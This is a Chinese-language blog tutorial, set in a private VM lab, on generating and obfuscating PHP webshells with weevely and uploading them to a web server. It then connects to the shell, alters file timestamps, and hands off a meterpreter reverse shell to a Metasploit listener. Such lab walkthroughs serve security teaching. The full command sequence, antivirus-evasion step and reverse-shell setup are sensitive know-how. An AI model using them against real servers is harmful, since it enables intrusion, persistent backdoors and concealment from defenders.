weevely生成木馬並反向shell連接msf

作者:小剛
一位苦於信息安全的萌新小白帽,記得關注給個贊,謝謝
本實驗僅用於信息防禦教學,切勿用於它用途

今天使用一下kali系統下的中國菜刀weevely,生成木馬文件、混淆木馬文件控制Web服務器,並進一步反彈shell給metasploit做進一步控制。

實驗環境

VM搭建的虛擬測試環境
1.phpstudy搭建主機 192.168.1.1
2.kali 192.168.1.128

weevely介紹

weevely是一款使用python編寫的webshell工具,很多說是linux下的中國菜刀,但只能用於PHP,weevely在linux上使用非常給力,但是在windows上很多模塊無法使用
在這裏插入圖片描述
weevely使用

生成shell wevely generate <password> <文件名>
連接shell weevely <URL> <password>[cmd]
生成混淆shell weevely generate -obfuscator <模板> <password><文件名>

使用流程

1,使用weevely生成php木馬文件

weevely generate XG ~/shell.php

在這裏插入圖片描述
這裏看到,生成一個大小779byte大小的PHP木馬文件,密碼是XG,文件名shell.php
上面生成的是普通木馬文件,下面生成的是基於weevely模板生成的混淆木馬,起到一定的防查殺作用 (實際作用不大,照樣能被騰訊、360全家桶掃出來。)
在這裏插入圖片描述
weevely generate -h查看參數,其中 -obfuscator是用來使用混淆模板的,有兩個自帶模板,我們使用第二個生成木馬文件shell2.php

weevely generate -obfuscator cleartext1_php XG shell2.php

在這裏插入圖片描述

2,將木馬文件上傳到被攻擊web服務器

這裏的上傳過程看你要攻擊的站點了,有文件上傳漏洞,代碼執行等等,反正能把木馬文件上傳到web目錄下就行。並要知道木馬所在的文件目錄。
由於是我自己搭建的web,就直接拖拽進去了。
開啓phpstudy。
在這裏插入圖片描述
找到shell.php所在的目錄
在這裏插入圖片描述
打來shell.php發現是空白文件,這是正常現象。能打開,說明shell.php文件能正常執行.
然後複製url鏈接
在這裏插入圖片描述

3,使用weevely連接木馬文件

weevely http://192.168.1.1/shell/shell.php XG

在這裏插入圖片描述
查看ip地址,已經連接到主機192.168.1.1
在這裏插入圖片描述
同樣的方式,連接生成的混淆shell2.php
在這裏插入圖片描述

4,控制參數

連接上shell就相當於控制服務器了,可以在weevely狀態下發?來查看可以使用的命令,這裏列出ji哥常用命令。

信息蒐集:
:system_info收集系統信息
:system_info -info client_ip whoami hostname查找自己連接的ip
文件管理
:file_touch 修改文件時間
:file_touch -human-ts '2018-09-15 200:41:20' 文件名
命令執行
:shell_php 執行PHP命令
:shell_php system('dir');

5,反向shell連接msf

連接上的weevely功能雖然很強大了,但是不要忘了更強的神器metasploit,我們可以使用weevely轉發到msf進而最深度的控制服務器。
在這使用:backdoor_meterpreter參數

weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.1.128 -port 4444

在這裏插入圖片描述

:backdoor_meterpreter 反向shell
-payload php/meterpreter/reverse_tcp 是搭載的攻擊載荷
-lhost 轉發給監聽的ip地址
-port 就是監聽端口了

轉發完成,接下來就是打開msf使用監聽模塊監聽,獲取控制權

use exploit/multi/handler
show payloads
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.128

在這裏插入圖片描述
最後run一下就可以監聽到,並進一步控制web服務器了。

總結

weevely用起來也算是菜刀的一種變形,但是搭配起msf可以說是無敵的存在。
weevely在Linux下使用很友好,但在windows下還是使用菜刀,蟻劍和冰蠍吧。
msf控制後的使用命令特別特別多,功能特別強大,說以說msf是滲透神器嘛。(提醒一下,真正進行滲透時的ip地址,要麼兩個主機在同一個內網網段,要麼在同一個公網,不然連接不上。)

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章